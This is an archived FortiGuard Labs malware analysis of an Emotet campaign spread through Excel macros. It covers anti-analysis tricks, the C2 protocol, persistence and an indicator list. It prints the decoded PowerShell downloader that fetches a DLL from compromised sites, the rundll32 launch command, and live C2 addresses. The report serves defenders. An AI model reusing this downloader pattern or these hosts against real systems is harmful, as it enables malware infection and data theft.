{
	"id": "ff4f06dc-5862-40ed-9a99-4de6a5e34b6b",
	"created_at": "2026-04-06T00:18:44.778632Z",
	"updated_at": "2026-04-10T13:12:18.191764Z",
	"deleted_at": null,
	"sha1_hash": "fadf927d266a91ccf53350360e0efa7a3f0b81fd",
	"title": "MS Office Files Involved Again in Recent Emotet Trojan Campaign – Part I | FortiGuard Labs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 559871,
	"plain_text": "MS Office Files Involved Again in Recent Emotet Trojan Campaign –\r\nPart I | FortiGuard Labs\r\nBy Xiaopeng Zhang\r\nPublished: 2022-03-07 · Archived: 2026-04-05 20:25:48 UTC\r\nRecently, Fortinet’s FortiGuard Labs captured more than 500 Microsoft Excel files that were involved in a campaign to\r\ndeliver a fresh Emotet Trojan onto the victim’s device.\r\nEmotet, known as a modular Trojan, was first discovered in the middle of 2014. Since then, it has become very active,\r\ncontinually updating itself. It has also been highlighted in cybersecurity news from time to time. Emotet uses social\r\nengineering, like email, to lure recipients into opening attached document files (including Word, Excel, PDF, etc.) or\r\nclicking links within the content of the email that download Emotet’s latest variant onto the victim’s device and then execute\r\nit.\r\nOur FortiGuard Labs team has monitored Emotet Trojan campaigns in the past and posted numerous technical analysis\r\nblogs.\r\nThis time, I grabbed an Excel file from the captured samples and conducted deep research on this campaign. In this part I of\r\nmy analysis, you can expect to learn: how an Excel file is leveraged to spread Emotet, what anti-analysis techniques Emotet\r\nuses in this variant, how it maintains persistence on a victim’s device, how this Emotet variant communicates with its C2\r\nserver, and how other modules are delivered, loaded, and executed on a victim’s system.\r\nAffected platforms: Microsoft Windows\r\nImpacted parties: 64-bit Windows Users\r\nImpact: Controls victim’s device and collects sensitive information\r\nSeverity level: Critical\r\nLooking into the Excel File\r\nFigure 1.1 – The Excel file is opened in the MS Excel program\r\nI have set my Excel’s macro option to \"Disable all macros with notification\" in \"Macro Settings.\" That’s why it shows the\r\nyellow “Security Warning” bar when an opened Excel file contains a Macro, as shown in Figure 1.1. This image shows the\r\nfake message used to lure a victim into clicking the “Enable Content” button to view the protected content of the Excel file.\r\nThe malicious Macro has a function called “Workbook_Open()” that is executed automatically in the background when the\r\nExcel file opens. It calls other local functions to write data to two files: \"uidpjewl.bat\" and \"tjspowj.vbs\" in the\r\n“C:\\ProgramData\\” folder. The written data is read out from multiple cells of this Excel file. In the end, the Macro executes\r\nthe \"tjspowj.vbs\" file with “wscript.exe.” Refer to Figure 1.2 for more information. \r\nhttps://www.fortinet.com/blog/threat-research/ms-office-files-involved-in-emotet-trojan-campaign-pt-one\r\nPage 1 of 10\n\nFigure 1.2 – VBA code in Macro used to execute the extracted \"tjspowj.vbs\" file\r\nVBS and PowerShell\r\nThe code in “tjspowj.vbs” is obfuscated. See Figure 2.1. The top part is the original code and the bottom part is the\r\nnormalized code.\r\nFigure 2.1 – VBS code in “tjspowj.vbs”\r\nThe code is very simple. It runs the early extracted “uidpjewl.bat” file, which downloads the Emotet payload file.\r\n“uidpjewl.bat” file is a DOS batch file containing the PowerShell code, which is encoded many times. To better understand\r\nits intention, I have decoded it below:\r\nhttps://www.fortinet.com/blog/threat-research/ms-office-files-involved-in-emotet-trojan-campaign-pt-one\r\nPage 2 of 10\n\n$MJXdfshDrfGZses4=\"hxxps://youlanda[.]org/eln-images/n8DPZISf/,hxxp://rosevideo[.]net/eln-images/EjdCoMlY8Gy/,hxxp://vbaint[.]com/eln-images/H2pPGte8XzENC/,hxxps://framemakers[.]us/eln-images/U5W2IGE9m8i9h9r/,hxxp://niplaw[.]com/asolidfoundation/yCE9/,http://robertmchilespe[.]com/cgi/3f/,http://vocoptions[.]net/cgi/ifM9R5ylbVpM\r\nfonts/JO5/,http://robertflood[.]us/eln-images/DGI2YOkSc99XPO/,http://mpmcomputing[.]com/fonts/fJJrjqpIY3Bt3Q/,http://dadsgetinthegame[.]com/eln-images/tAAUG/,http://smbservices[.]net/cgi/JO01ckuwd/,http://stkpointers[.]com/eln-images/D/,hxxp://rosewoodcraft[.]com/Merchant2/5.00/PGqX/\".sPLIt(\",\");\r\nfoReACh($yIdsRhye34syufgxjcdf iN $MJXdfshDrfGZses4){\r\n$GweYH57sedswd=(\"c:\\programdata\\puihoud.dll\");\r\ninvoke-webrequest -uri $yIdsRhye34syufgxjcdf -outfile $GweYH57sedswd;\r\niF(test-path $GweYH57sedswd) {\r\nif((get-item $GweYH57sedswd).length -ge 47436) { break; }\r\n}\r\n}\r\nIt tries to download Emotet (into a local file, \"c:\\programdata\\puihoud.dll\", that is hardcoded in the PowerShell) from a\r\ngroup of websites until any download is successfully completed.\r\nMeanwhile, the caller “tjspowj.vbs” file takes responsibility for running the downloaded Emotet with the command \"cmd /c\r\nstart /B c:\\windows\\syswow64\\rundll32.exe c:\\programdata\\puihoud.dll,tjpleowdsyf\".\r\n“C:\\Windows\\SysWOW64\\” is a system folder created by Microsoft for storing 32-bit files. “WOW64” is the x86 emulator\r\nthat allows 32-bit Windows applications to run on 64-bit Windows. It only exists in 64-bit architecture Windows. In other\r\nwords, although the downloaded Emotet file was compiled for 32-bit architecture, this variant only affects 64-bit Windows\r\nusers. It terminates execution and pops up an error message when it runs on a 32-bit Windows because the file is not found.\r\n“rundll32.exe” is a system file that loads and runs 32-bit dynamic-link library (DLL) files. It uses the command line syntax\r\n“rundll32.exe DLLname,\u003cExport Function\u003e”, where the “Export Function” is optional. “puihoud.dll” is the DLL name for\r\nthis Emotet and the subsequent export function name (“tjpleowdsyf”) is a random string. In an analysis tool, I found it only\r\nhas one export function, called “DllRegisterServer()”. Let’s see what happens with a random export function.\r\nStart Emotet in Rundll32\r\nOnce the Emotet file (“puihoud.dll”) is loaded by “rundll32.exe”, its entry point function is called the very first time. It then\r\ncalls the DllMain() function where it loads and decrypts a 32-bit Dll into its memory from a “Resource” named “HITS”. The\r\ndecrypted Dll is the core of this Emotet, which will be referred to as “X.dll” in this analysis due to a hardcoded constant\r\nstring in its code, as shown below.\r\n10024030 ; Export Ordinals Table for X.dll       \r\n10024032 aX_dll          db 'X.dll',0            \r\n10024038 aDllregisterser db 'DllRegisterServer',0\r\nhttps://www.fortinet.com/blog/threat-research/ms-office-files-involved-in-emotet-trojan-campaign-pt-one\r\nPage 3 of 10\n\nFigure 3.1 – Decrypt function and the decrypted X.dll\r\nFigure 3.1 shows the relevant functions used to decrypt and deploy the decrypted “X.dll”, which is in memory. The\r\nEntryPoint() function of “X.dll” is called after its deployment.\r\n“X.dll” checks if the export function name from the command line parameter is “DllRegisterServer”. If not, it runs the\r\ncommand line again with “DllRegisterServer” instead of the random string, like \"C:\\Windows\\system32\\rundll32.exe\r\nc:\\programdata\\puihoud.dll,DllRegisterServer\" (see step 1 \u0026 2 in Figure 3.3). It then calls ExitProcess() to exit the first\r\n“rundll32.exe”. In Figure 3.2 it is about to call the API CreateProcessW() to run the new command.\r\nFigure 3.2 – “X.dll” starts “puihoud.dll” with “DllRegisterServer”\r\nhttps://www.fortinet.com/blog/threat-research/ms-office-files-involved-in-emotet-trojan-campaign-pt-one\r\nPage 4 of 10\n\nFigure 3.3 – Work flow of Emotet to reach its core code\r\nWhen Emotet is running with the “DllRegisterServer” export function, it will normally exit from X.dll’s EntryPoint() as well\r\nas puihoud.dll’s EntryPoint() (step 3 in Figure 3.3). Next, rundll32 calls the API GetProcAddress() to gather the export\r\nfunction “DllRegisterServer” from “puihoud.dll” and call it. Finally, puihoud.dll!DllRegisterServer calls X.dll!\r\nDllRegisterServer() (step 4 in Figure 3.3).\r\nThis is also pretty much the way rundll32.exe loads and runs a dll file with an export function.\r\nX.dll!DllRegisterServer() is the real starting point for executing malicious things on the victim’s device.\r\nAnti-Analysis Techniques\r\nTo protect its code from being analyzed, Emotet uses anti-analysis techniques. In this section I will explain what kinds of\r\nsuch techniques this variant uses.\r\nCode Flow is Obfuscated\r\nIn most functions, it mixes the code flow with lots of “goto” statements. It has a local variable, called “switch_number” by\r\nme, that holds a dynamic number to control how it executes the code.\r\nThe logic is that all codes are enclosed in a “while infinite loop” statement, which determines which code flow to enter\r\n(“goto”) according to the value of “switch_number”. And “switch_number” is modified each time after being used, then\r\nonce the code branch task is finished it goes back to the “while” statement to check the “switch_number” again.\r\nThis technique really causes trouble for security researchers trying to analyze the function’s intention and trace its code.\r\nFigure 4.1 is a pseudo code in C that reveals the obfuscated code flow.\r\nhttps://www.fortinet.com/blog/threat-research/ms-office-files-involved-in-emotet-trojan-campaign-pt-one\r\nPage 5 of 10\n\nFigure 4.1 – Pseudo code of obfuscated code flow\r\nStrings are Encrypted\r\nAll constant strings are encrypted and are only decrypted just before being used. The constant strings are usually very useful\r\nhints for researchers to quickly locate the key point of the malware.\r\nConstant Numbers are Obfuscated\r\nNormally, the constant numbers are useful to researchers for guessing the code’s purpose. Here is an example. The\r\ninstruction “mov [esp+2ACh+var_1A0], 2710h” has been obfuscated, as seen in the three instructions below.\r\nmov     [esp+2ACh+var_1A0], 387854h\r\nor      [esp+2ACh+var_1A0], 0F1FDFF8Dh\r\nxor     [esp+2ACh+var_1A0], 0F1FDD8CDh\r\nAll APIs are hidden\r\nThe APIs are obtained using a hash code of both the API name and the module name that the function belongs to. Each time\r\nEmotet needs to call an API, it calls a local function to obtain it in the EAX register and then calls it. Figure 4.2 is an\r\nexample of calling API GetCommandLineW(), where 0xB03E1C69 is the hash code of module “kernel32” and 0x4543B55E\r\nis the hash code of “GetCommandLineW”.\r\nFigure 4.2 – Getting the API GetCommandLineW() and invoking it\r\nhttps://www.fortinet.com/blog/threat-research/ms-office-files-involved-in-emotet-trojan-campaign-pt-one\r\nPage 6 of 10\n\nCommunicating with the C2 Server\r\nOnce Emotet finishes collecting the basic information from the victim’s device, it calls the API BCryptEncrypt() to encrypt\r\nthe data. Let’s look at the kind of data contained in the collected data, as shown in Figure 5.1.\r\nFigure 5.1 – Collected basic data to encrypt\r\nThe 60H bytes data in memory is the plaintext data to be encrypted. Let me explain what most of the data is.\r\n0x20, at offset+4, is the size of sha256 hash code followed, which includes the bytes starting from offset+8 to offset+0x27\r\n(A0 C9 … 68 F8). That is a sha256 hash code of the entire following data, starting at offset+28h.\r\n0x2C, at offset+28h, is the size of the following data. The next 0x10 is the length of the victim’s ID\r\n(“BOBSXPC_9C09B592”), which is a combination of the computer name and the system driver’s volume number. To\r\nobtain this information, Emotet calls APIs like GetComputerName(), GetWindowsDirectoryW(), and\r\nGetVolumeInformationW().\r\nThe following dword 0x29C220DD is a hash code of Emotet Dll’s full path. 0x13465AA is a constant value defined in its\r\ncode. It may be a malware ID of this Emotet. 0x2710 is another constant value, and I suppose it is a sort of version of this\r\nvariant. 0x19E7D is a combination of the victim’s system information, including Windows version, architecture, and so on.\r\nTo get this information it needs to call APIs RtlGetVersion() and GetNativeSystemInfo(). 0x01 at offset+50h is a current\r\nprocess ID (rundll32.exe) related value.\r\nThe last data, starting at offset+58h, is meaningless padding (AB AB AB…).\r\nThe encrypted binary data will be converted into base64 string by calling the API CryptBinaryToStringW(). The base64\r\nstring is submitted to the C2 server as a “Cookies” value in an HTTP Get request. \r\nFigure 5.2 – Sending encrypted data to C2 server\r\nIn the example shown in Figure 5.2, as you may have noticed, the Cookie name and URL are randomized by Emotet to\r\nbypass the cybersecurity device’s detection.\r\nhttps://www.fortinet.com/blog/threat-research/ms-office-files-involved-in-emotet-trojan-campaign-pt-one\r\nPage 7 of 10\n\nIn total, there are 49 C2 servers (IP address and port) hardcoded and encrypted within this variant. Please refer to the “C2\r\nServer List” under the “IOCs” section for all the IP addresses and ports.\r\nThe C2 server detects the submitted data to determine next steps, including replying with Emotet modules and commands\r\nfor further actions.\r\nThe replied data is encrypted binary data in the HTTP response body. In Figure 5.3, below, the marked box is an example of\r\nthe data just after decryption.\r\nFigure 5.3 – The decrypted C2 response data\r\nThe decrypted data is 60H long and contains both verification data and control data.\r\n0x40 at the beginning is the size of the verification data, the signature data (31 1B … 3C 6D), which is a signed hash of the\r\ncontrol data. The received data must pass verification, otherwise it drops the packet. The control data starts from offset+54H\r\nto the end. 0x8 is the size of the following data. The control data in this packet is two dword numbers — 0x00.\r\nThe first 0x00 is a flag that can be 0, 1, or 8.\r\nIf the flag is 8, Emotet will uninstall itself from the victim’s device, including removing the auto-run item from system\r\nregistry, deleting the file(s) or folder(s) it created, as well as deleting the Emotet Dll file.\r\nIf the flag is 0 and the second dword is not 0 (it should be the size of the attached module to this packet), it executes the\r\nmodule on the victim’s device.\r\nIf the flag is 1, it goes to the flag 0’s branch. I’ll explain this part in more detail in the next part of this analysis.\r\nRelocate and Persistent\r\nOnce Emotet receives a valid response from the C2 server, it relocates the downloaded Emotet dll file from\r\n“C:\\Windows\\ProgramData\\puihoud.dll” (in my analysis environment) into the “%LocalAppData%” folder.  Moreover, to\r\nremain in the victim’s device, Emotet makes itself persistent by adding the relocated file into the auto-run group in the\r\nsystem registry. Emotet is then able to run at system startup. Figure 6.1 is a screenshot of the Registry Editor displaying the\r\nauto-run item in the system registry.\r\nFigure 6.1 – Added auto-run item in the system registry.\r\nConclusion\r\nIn this post we have walked through the malicious Macro within a captured Excel file, which downloads Emotet via two\r\nextracted files, \"uidpjewl.bat\" and \"tjspowj.vbs\".\r\nWe then went through how the downloaded Emotet Dll file is run in a rundll32.exe process as well as how it extracts the\r\nEmotet core X.dll from its “Resource”.\r\nI also explained what kinds of anti-analysis techniques this Emotet uses to protect its code from being analyzed.\r\nAnd finally, I elaborated on what kind of data Emotet collects from the victim’s system and how the binary data is encrypted\r\nand converted into base64 string and finally submitted to its C2 server via an HTTP packet.\r\nIn the next part of this analysis, I will focus on those returned modules from Emotet’s C2 server and how they are executed\r\nby Emotet, as well as what sensitive data they are able to steal from the victim’s device.\r\nhttps://www.fortinet.com/blog/threat-research/ms-office-files-involved-in-emotet-trojan-campaign-pt-one\r\nPage 8 of 10\n\nPlease stay tuned.\r\nFortinet Protections\r\nFortinet customers are already protected from this malware by FortiGuard’s Web Filtering, AntiVirus, FortiMail, FortiClient,\r\nFortiEDR, and CDR (content disarm and reconstruction) services, as follows:\r\nThe malicious Macro inside the Excel sample can be disarmed by the FortiGuard CDR (content disarm and reconstruction)\r\nservice.\r\nAll relevant URLs have been rated as \"Malicious Websites\" by the FortiGuard Web Filtering service.\r\nThe captured Excel sample and the downloaded Emotet dll file are detected as \"VBA/Emotet.2826!tr.dldr \" and \"\r\nW32/Emotet.B185!tr\" and are blocked by the FortiGuard AntiVirus service.\r\nFortiEDR detects both the Excel file and Emotet dll file as malicious based on its behavior.\r\nIn addition to these protections, we suggest that organizations have their end users also go through the FREE NSE\r\ntraining: NSE 1 – Information Security Awareness. It includes a module on Internet threats that is designed to help end users\r\nlearn how to identify and protect themselves from phishing attacks.\r\nIOCs\r\nURLs Involved in the Campaign:\r\n\"hxxps[:]//youlanda[.]org/eln-images/n8DPZISf/\"\r\n\"hxxp[:]//rosevideo[.]net/eln-images/EjdCoMlY8Gy/\"\r\n\"hxxp[:]//vbaint[.]com/eln-images/H2pPGte8XzENC/\"\r\n\"hxxps[:]//framemakers[.]us/eln-images/U5W2IGE9m8i9h9r/\"\r\n\"hxxp[:]//niplaw[.]com/asolidfoundation/yCE9/\"\r\n\"hxxp[:]//robertmchilespe[.]com/cgi/3f/\"\r\n\"hxxp[:]//vocoptions[.]net/cgi/ifM9R5ylbVpM8hfR/\"\r\n\"hxxp[:]//missionnyc[.]org/fonts/JO5/\"\r\n\"hxxp[:]//robertflood[.]us/eln-images/DGI2YOkSc99XPO/\"\r\n\"hxxp[:]//mpmcomputing[.]com/fonts/fJJrjqpIY3Bt3Q/\"\r\n\"hxxp[:]//dadsgetinthegame[.]com/eln-images/tAAUG/\"\r\n\"hxxp[:]//smbservices[.]net/cgi/JO01ckuwd/\"\r\n\"hxxp[:]//stkpointers[.]com/eln-images/D/\"\r\n\"hxxp[:]//rosewoodcraft[.]com/Merchant2/5[.]00/PGqX/\"\r\nC2 Server List in this Variant: (49 in total)\r\n185[.]248[.]140[.]40:443\r\n8[.]9 [.]11 [.]48:443\r\n200[.]17 [.]134 [.]35:7080\r\n207[.]38 [.]84 [.]195:8080\r\n79[.]172 [.]212 [.]216:8080\r\n45[.]176 [.]232 [.]124:443\r\n45[.]118 [.]135 [.]203:7080\r\n162[.]243 [.]175 [.]63:443\r\n110[.]232[.]117[.]186:8080\r\n103[.]75[.]201[.]4:443\r\n195[.]154[.]133[.]20:443\r\n160[.]16[.]102[.]168:80\r\n164[.]68[.]99[.]3:8080\r\n131[.]100[.]24[.]231:80\r\n216[.]158[.]226[.]206:443\r\n159[.]89[.]230[.]105:443\r\n178[.]79[.]147[.]66:8080\r\n178[.]128[.]83[.]165:80\r\n212[.]237[.]5[.]209:443\r\n82[.]165[.]152[.]127:8080\r\n50[.]116[.]54[.]215:443\r\n58[.]227[.]42[.]236:80\r\n119[.]235[.]255[.]201:8080\r\n144[.]76[.]186[.]49:8080\r\nhttps://www.fortinet.com/blog/threat-research/ms-office-files-involved-in-emotet-trojan-campaign-pt-one\r\nPage 9 of 10\n\n138[.]185[.]72[.]26:8080\r\n162[.]214[.]50[.]39:7080\r\n81[.]0[.]236[.]90:443\r\n176[.]104[.]106[.]96:8080\r\n144[.]76[.]186[.]55:7080\r\n129[.]232[.]188[.]93:443\r\n212[.]24[.]98[.]99:8080\r\n203[.]114[.]109[.]124:443\r\n103[.]75[.]201[.]2:443\r\n173[.]212[.]193[.]249:8080\r\n41[.]76[.]108[.]46:8080\r\n45[.]118[.]115[.]99:8080\r\n158[.]69[.]222[.]101:443\r\n107[.]182[.]225[.]142:8080\r\n212[.]237[.]17[.]99:8080\r\n212[.]237[.]56[.]116:7080\r\n159[.]8[.]59[.]82:8080\r\n46[.]55[.]222[.]11:443\r\n104[.]251[.]214[.]46:8080\r\n31[.]24[.]158[.]56:8080\r\n153[.]126[.]203[.]229:8080\r\n51[.]254[.]140[.]238:7080\r\n185[.]157[.]82[.]211:8080\r\n217[.]182[.]143[.]207:443\r\n45[.]142[.]114[.]231:8080\r\nSample SHA-256 Involved in the Campaign:\r\n[Excel files Captured]\r\n25271BB2C848A32229EE7D39162E32F5F74580E43F5E24A93E6057F7D15524F0\r\nC176C2B0336EA70C0D875F5C79D00771D59891560283364A81B2EDE495CDE62F\r\n9C62600A0885E39BD39748150B9B64155C9EA2DBBCDD43241EB24C8E098DE782\r\n36C2119C68B3C79B58417CADEA3547F8BBECD2DF02FEB5F04EE798DFA621B66D\r\nB380DFC348541691E4084689405D8ACFAEAFDDD92EFF95566AFF2412F620E2DC\r\n68AA775EC46C8B0911542E471F9A7F39D538001BD8552898416310436F58B95A\r\nB14AB6A611A93B25DA2815D2071AA5B76085414BF6AD32432FC0809B3610DB05\r\n81E9D87903290E4A525BEB865F5CCCCA9838BDD51238DC4FD0B9AE623BF609BB\r\nB019A867D167B6088EA18B3BD2F1A67706505AACC9542C4017E757F0381B3F0A\r\nF4626135C820C4784E1452E81FE25D291EA3A6326E906A2E15AE960EEA3276E4\r\n[puihoud.dll (the downloaded Emotet)]\r\nA7C6ABBC3241B6CFCFA27158E80BD50D3C9F1AE97E86481CCABD5B2337670690\r\nLearn more about Fortinet’s FortiGuard Labs threat research and intelligence organization and the FortiGuard Security\r\nSubscriptions and Services portfolio.\r\nRead part II of our analysis to learn more about malicious modules involved and how to avoid this lure.\r\nSource: https://www.fortinet.com/blog/threat-research/ms-office-files-involved-in-emotet-trojan-campaign-pt-one\r\nhttps://www.fortinet.com/blog/threat-research/ms-office-files-involved-in-emotet-trojan-campaign-pt-one\r\nPage 10 of 10",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.fortinet.com/blog/threat-research/ms-office-files-involved-in-emotet-trojan-campaign-pt-one"
	],
	"report_names": [
		"ms-office-files-involved-in-emotet-trojan-campaign-pt-one"
	],
	"threat_actors": [],
	"ts_created_at": 1775434724,
	"ts_updated_at": 1775826738,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fadf927d266a91ccf53350360e0efa7a3f0b81fd.pdf",
		"text": "https://archive.orkl.eu/fadf927d266a91ccf53350360e0efa7a3f0b81fd.txt",
		"img": "https://archive.orkl.eu/fadf927d266a91ccf53350360e0efa7a3f0b81fd.jpg"
	}
}